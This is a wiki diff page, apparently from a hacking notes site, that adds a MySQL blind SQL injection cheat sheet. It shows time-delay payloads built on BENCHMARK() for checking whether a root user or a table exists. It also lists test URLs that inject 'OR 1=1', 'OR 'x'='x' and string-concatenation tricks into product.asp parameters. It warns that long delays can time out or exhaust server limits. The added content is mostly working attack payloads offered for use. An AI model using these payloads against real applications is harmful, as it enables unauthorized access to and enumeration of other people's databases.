Differences

This shows you the differences between two versions of the page.

--- hacking:sql_injection:mysql:blind_sql_injections [2020/04/16 22:46] – created peter
+++ hacking:sql_injection:mysql:blind_sql_injections [2020/07/15 09:30] (current) – external edit 127.0.0.1
@@ Line 16: / Line 16: @@
 This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names.
+----
+===== Making Databases Wait / Sleep For Blind SQL Injection Attacks =====
+Use this if it's really blind, otherwise just use 1/0 style errors to identify difference.
+Be careful while using times more than 20-30 seconds; database API connection or script can be timeout.
+<code sql>
+BENCHMARK()
+</code>
+Basically, we are abusing this command to make MySQL wait a bit.  Be careful you will consume web servers limit so fast!
+<code sql>
+BENCHMARK(howmanytimes, do this)
+</code>
+Are we root?
+<code sql>
+IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
+</code>
+Check Table exist in MySQL
+<code sql>
+IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
+</code>
+----
+===== Clear SQL Injection Tests =====
+These tests are simply good for blind sql injection and silent attacks.
+<code sql>
+product.asp?id=4
+  product.asp?id=5-1
+  product.asp?id=4 OR 1=1
+product.asp?name=Book
+  product.asp?name=Bo'%2b'ok
+  product.asp?name=Bo' || 'ok
+  product.asp?name=Book' OR 'x'='x
+</code>
+----